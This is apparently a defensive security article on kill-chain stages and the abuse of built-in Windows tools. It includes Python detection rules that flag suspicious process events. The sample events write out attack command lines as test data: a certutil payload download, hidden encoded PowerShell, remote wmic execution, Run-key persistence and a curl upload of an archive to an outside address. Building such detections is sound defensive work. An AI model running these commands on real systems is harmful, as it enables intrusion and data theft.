Security SOC Vulnerability

How to defend with (or without) a SOC as the first line of defense?

Do you want to understand modern cyber threats and the attack surfaces most commonly used by malware and other cyber-attacks?
Don’ts:
1.) Don’t hand the attacker everything easily; make every step harder to achieve. (Control measures in the network)
2.) Don’t leave legitimate but abusable applications enabled if they are not in use; attackers routinely rely on the legitimate tools already present in the network. (Abuse of LOLBins)
3.) Don’t assume the attacker relies on a single piece of code; attacks proceed in stages, each adding further commands and functionality. (Cyber kill chains)

Do’s:
1.) Defend against malware delivery, i.e. the attacker entering your organization’s network.
2.) If the malware is delivered successfully, how will you defend against its lateral movement and persistence, i.e. the attacker moving inside your organization’s network?
3.) Once the attacker has accomplished all his activities, his final stage is exfiltration or breach, i.e. leaving your organization’s network.
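The three Do’s and the LOLBin Don’t can be turned into detection logic that does not need a full SOC behind it. The following is an added example, not code from the original page: a small rule set that maps Windows process-creation events to the three stages above (delivery into the network, movement and persistence inside it, data leaving it) and additionally flags any execution of a living-off-the-land binary the organization has decided it does not use. The event format (a Sysmon-like dict with parent, image and command line), the list of unused LOLBins, the rule thresholds and the sample events are all constructed assumptions for illustration; tune them to your own environment.

```python
"""Stage-mapped LOLBin detection over process-creation events (added example).

Assumptions (not from the original page): events are dicts with "id",
"parent", "image" and "cmdline" keys, in the spirit of Sysmon event ID 1;
UNUSED_LOLBINS is a hypothetical organisation-specific deny list.
"""
import re
from dataclasses import dataclass

# Legitimate Windows binaries this (hypothetical) organisation does not use.
# Any execution is a finding regardless of stage (the page's second "Don't").
UNUSED_LOLBINS = {"mshta.exe", "certutil.exe", "regsvr32.exe", "bitsadmin.exe"}

OFFICE_APPS = {"winword.exe", "excel.exe", "outlook.exe", "powerpnt.exe"}
SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe", "powershell.exe",
                "rundll32.exe", "regsvr32.exe", "cmd.exe"}


@dataclass(frozen=True)
class Finding:
    stage: str      # "delivery", "movement", "exfiltration" or "control"
    rule: str
    event_id: int


# --- Stage 1: delivery / initial execution (attacker entering the network) ---
def _office_spawns_script_host(ev):
    return ev["parent"] in OFFICE_APPS and ev["image"] in SCRIPT_HOSTS

def _encoded_powershell(ev):
    # -e / -ec / -enc / -EncodedCommand followed by a base64 blob
    return ev["image"] == "powershell.exe" and re.search(
        r"(?i)(^|\s)-(e|ec|enc|encodedcommand)\s", ev["cmdline"]) is not None

def _download_cradle(ev):
    cl = ev["cmdline"].lower()
    return (ev["image"] == "certutil.exe" and "-urlcache" in cl) or \
           (ev["image"] == "bitsadmin.exe" and "/transfer" in cl)

# --- Stage 2: lateral movement and persistence (moving inside the network) ---
def _remote_process_creation(ev):
    cl = ev["cmdline"].lower()
    return (ev["image"] == "wmic.exe" and "/node:" in cl and "process call create" in cl) \
        or ev["image"] == "psexec.exe" \
        or (ev["image"] == "schtasks.exe" and " /s " in cl and " /create" in cl)

def _run_key_persistence(ev):
    cl = ev["cmdline"].lower()
    return ev["image"] == "reg.exe" and " add " in cl and r"\currentversion\run" in cl

# --- Stage 3: exfiltration (data leaving the network) ---
def _upload_via_lolbin(ev):
    cl = ev["cmdline"].lower()
    return (ev["image"] == "curl.exe" and
            ("-t " in cl or "--upload-file" in cl or re.search(r"(-d|--data(-binary)?)\s+@", cl))) \
        or (ev["image"] == "powershell.exe" and "invoke-webrequest" in cl and "-method post" in cl) \
        or ev["image"] == "rclone.exe"

RULES = [
    ("delivery", "office_spawns_script_host", _office_spawns_script_host),
    ("delivery", "encoded_powershell", _encoded_powershell),
    ("delivery", "download_cradle", _download_cradle),
    ("movement", "remote_process_creation", _remote_process_creation),
    ("movement", "run_key_persistence", _run_key_persistence),
    ("exfiltration", "upload_via_lolbin", _upload_via_lolbin),
]


def _basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def normalise(ev):
    """Reduce full image/parent paths to lowercase basenames for matching."""
    return {"id": ev["id"], "parent": _basename(ev["parent"]),
            "image": _basename(ev["image"]), "cmdline": ev["cmdline"]}

def evaluate(events):
    findings = []
    for raw in events:
        ev = normalise(raw)
        if ev["image"] in UNUSED_LOLBINS:
            findings.append(Finding("control", "lolbin_not_in_use", ev["id"]))
        for stage, name, predicate in RULES:
            if predicate(ev):
                findings.append(Finding(stage, name, ev["id"]))
    return findings

def summarise(findings):
    """Count of findings per kill-chain stage, for a quick triage view."""
    counts = {}
    for f in findings:
        counts[f.stage] = counts.get(f.stage, 0) + 1
    return counts


# Constructed sample events (TEST-NET addresses, fictitious host names).
SAMPLE_EVENTS = [
    {"id": 1, "parent": r"C:\Program Files\Microsoft Office\WINWORD.EXE",
     "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta.exe http://198.51.100.7/u.hta"},
    {"id": 2, "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc SQBFAFgA"},
    {"id": 3, "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": "certutil -urlcache -split -f http://198.51.100.7/a.exe a.exe"},
    {"id": 4, "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\wbem\wmic.exe",
     "cmdline": "wmic /node:FS01 process call create \"cmd.exe /c whoami\""},
    {"id": 5, "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\reg.exe",
     "cmdline": r"reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v upd /t REG_SZ /d C:\Users\Public\upd.exe"},
    {"id": 6, "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\curl.exe",
     "cmdline": r"curl.exe -T C:\Users\Public\db.7z https://203.0.113.9/up"},
    {"id": 7, "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\notepad.exe", "cmdline": "notepad.exe"},
    {"id": 8, "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe Get-Process"},
]

if __name__ == "__main__":
    for f in evaluate(SAMPLE_EVENTS):
        print(f"event {f.event_id}: {f.stage:12s} {f.rule}")
    print(summarise(evaluate(SAMPLE_EVENTS)))
```

Events 7 and 8 (a benign editor and an unencoded PowerShell command) produce no findings, while event 1 produces two: the office-to-script-host chain places it in the delivery stage, and mshta.exe being on the organisation’s unused list flags it again as a control-measure violation. Grouping findings by stage is what lets a small team without a SOC decide whether they are looking at something arriving, something spreading, or something already on its way out.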